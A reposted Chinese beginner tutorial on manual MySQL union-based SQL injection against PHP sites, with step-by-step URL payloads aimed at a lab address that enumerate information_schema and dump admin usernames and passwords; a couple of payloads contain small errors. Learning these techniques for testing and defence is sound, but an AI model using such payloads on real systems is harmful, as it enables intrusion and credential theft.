Web安全入门(MySQL手工注入)

最新推荐文章于 2024-07-26 14:53:47 发布
最新推荐文章于 2024-07-26 14:53:47 发布
阅读量125 收藏
点赞数
文章标签: 数据库 php web安全
原文链接:http://www.cnblogs.com/Letho/p/11171412.html
版权

MySQL注入主要是针对php的,这里先列举一点MySQL的基本操作:
select version();       #查看mysql版本

select user();      #查看当前用户

select database();      #查看当前打开的数据库

show databases;     #查看MySQL中包含了哪些数据库

use test;        #打开test数据库

show tables;       #显示数据库中的表

 

关于MySQL手工注入要引入一个重要概念:元数据库information_schema

在5.0以后版本的MySQL中存在着一个元数据库information_schema,其中存储着用户在MySQL中创建的所有其他数据库的信息,在对PHP+MySQL类网站进行注入时,主要就是针对information_schema数据库进行操作

information_schema中比较重要的数据表:

a.schemata:用于存放所有数据库的名字

b.tables:用于存放所有数据库中的数据表的名字

c.columns:用于存放所有数据库的所有数据表中的所有字段的名字

利用information_schema查看其他数据库的内容:

select table_name from information_schema.tables where table_schema="test";    #查看test数据库中包含了哪些表

select column_name from information_schema.columns where table_name="hack";   #查看hack数据表中包含了哪些字段

 

MySQL手工注入一般过程:

1.判断注入点,这个和ACCESS一样,就不多说了

假设URL为:192.168.80.X/info_show.php?info_id=12

 

2.判断字段数(假设字段数为5):

还是用order by

 

3.联合查询(不需要指定表名)

192.168.80.X/info_show.php?info_id=12 union select 1,2,3,4,5

如果不想显示出原有界面,可以在union前附加条件:"and 1=2"

192.168.80.X/info_show.php?info_id=12  and 1=2 union select 1,2,3,4,5

 

4.查询版本号,当前用户,当前数据库

将可见字段替换为version(),user() ,database()(假设2,3,4为可见字段)

192.168.80.X/info_show.php?info_id=12 union select 1,version(),user(),database(),5

注:查询版本号是为了判断能不能对元数据库进行操作,查询当前用户可以判断下是否为管理员

 

5.查看当前数据库中的表(假设A为当前数据库):

192.168.80.X/info_show.php?info_id=12  and 1=2 select 1,table_name,3,4,5 from information_schema.tables where table_schema="A"

这里还有比较有用的一个函数:group_concat(),可以显示字段中的所有内容

192.168.80.X/info_show.php?info_id=12  and 1=2  union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema="A"

 

6.查看表中的字段(假设存放用户名密码的表为admin)

192.168.80.X/info_show.php?info_id=12  and 1=2 union select 1,column_name,3,4,5 from information_schema.columns where table_name="admin"

同样的这里也可以加group()函数

 

7. 爆用户名密码

在知道字段的情况下,直接把可显字段替换为username和password可能还会显示不出来,这是因为网站编码不一致导致的问题,这里可以用一个函数:unhex(hex())进行编码转换

192.168.80.X/info_show.php?info_id=12  and 1=2 union select 1,unhex(hex(username)),unhex(hex(password)),4,5 from admin

注:关于这个函数的作用,就像记事本一样,可以自动过滤掉所有格式,只留下纯文本

 

  关于MySQL手工注入这里就总结这么多,同样的也有很多现成的工具可以进行MySQL注入,有兴趣的可以自己找一下。

转载于:https://www.cnblogs.com/Letho/p/11171412.html

aifan8968
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈web安全手工检测sql注入以及获得信息
chuange6363的博客
08-14 134
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 检验是否可以注入 and 1=1 正常 and 1=2 出错 http://localhost/sqlilabs/Less-2/?id=1是...
Web安全测试(一)-手工安全测试方法&修改建议
热门推荐
li_liu10的博客
02-03 1万+
本文主要简述了Web类网站常见安全性问题,罗列简单手工测试方法及相关解决方法,结合部分网络资料及实际项目处理方法,希望给大家提供一定养份
web中输入密码MySQL_Web安全入门(MySQL手工注入)
weixin_39996908的博客
01-20 97
MySQL注入主要是针对php的,这里先列举一点MySQL的基本操作:select version();     #查看mysql版本select user();      #查看当前用户select database();    #查看当前打开的数据库show databases;     #查看MySQL中包含了哪些数据库use test;        #打开test数据库show ...
Web安全之SQL注入(一)
weixin_50593647的博客
09-26 206
一、有关知识点 SQL语言 :结构化查询语言(Structured Query Language),简称SQL,是数据库的标准查询语言,可以通过DBMS(数据库管理系统)对数据库进行定义数据,操纵数据,查询数据,数据控制等。 数据库(database):数据库是一个按数据结构来存储和管理数据的计算机软件系统。 两者联系:数据库管理系统(DBMS-Database Management System)就是通过SQL语言对数据库进行管理的软件,我们常说的Mysql数据库、Sql Ser...
WEB安全入门基础.pptx
08-24
WEB 安全入门基础工具包括 PHPStudy、Apache、PHP、Mysql 等工具,这些工具可以帮助我们更好地进行 WEB 安全测试。 WEB 安全入门基础概念 WEB 安全入门基础概念包括 WEB 安全的定义、WEB 安全的重要性、WEB 安全的...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
PHP、mysql手工注入
10-12
然而,随着技术的发展,网络安全问题也日益凸显,其中“手工注入”就是一种针对PHP与MySQL应用的严重安全威胁。 PHP手工注入,全称MySQL手工SQL注入,是指攻击者通过输入恶意的SQL语句,利用应用程序对用户输入数据...
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
PHP+MySQL 手工注入语句大全 推荐
10-29
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 698
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
秒杀业务: 简单梳理
m0_59925573的博客
07-23 1598
(1)在一人一单优惠券秒杀中,先是解决了因线程安全导致的超卖问题,为了满足一人一单的业务需求需要给查询订单表查询库存表上锁,但是synchronized只能满足单机环境下线程安全,在分布式环境对多个JVM需要使用分布式锁,于是手写分布式锁,但是在极端情况下,例如业务超时,会出现“误删”问题,手写锁无法解决,于是引入redisson,借助看门狗机制可以有效解决这个问题。
家政项目小程序的设计
2401_85476437的博客
07-26 335
管理员账户功能包括:系统首页,个人中心,用户管理,家政人员管理,家政服务管理,咨询信息管理,咨询服务管理,家政预约管理,留言板管理,系统管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,家政服务,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
图数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 244
图数据库查询与操作指南-以Nebula图数据库为例
AccessLog| 一款开源的日志分析系统
ClkLog的博客
07-26 323
系统采用Java语言、搭配OLAP数据库,涵盖基本web日志分析,同时提供性能分析,帮助高效运维
基于宝塔的 Bytebase 可视化安装、配置、部署教程
最新发布
Bytebase的博客
07-26 328
Bytebase是一款使用Go语言开发的开源数据库管理软件,旨在为DBA(数据库管理员)、开发人员和平台工程师提供一个基于Web的协作工作区,用于管理数据库的整个生命周期。本文将介绍如何在宝塔面板上可视化安装、部署、配置Bytebase教程。
redis常用指令
m0_62289159的博客
07-22 861
redis常用指令
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 251
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1239
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
Web安全初探:SQL注入与漏洞分析
"Web安全入门PPT课件涵盖了Web安全的基础知识,包括Web的B/S架构,Web程序的执行过程,以及重点讲解了Web漏洞中的SQL注入问题。" Web安全是一个重要的领域,对于任何涉及Web应用程序开发、维护或管理的人来说都是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值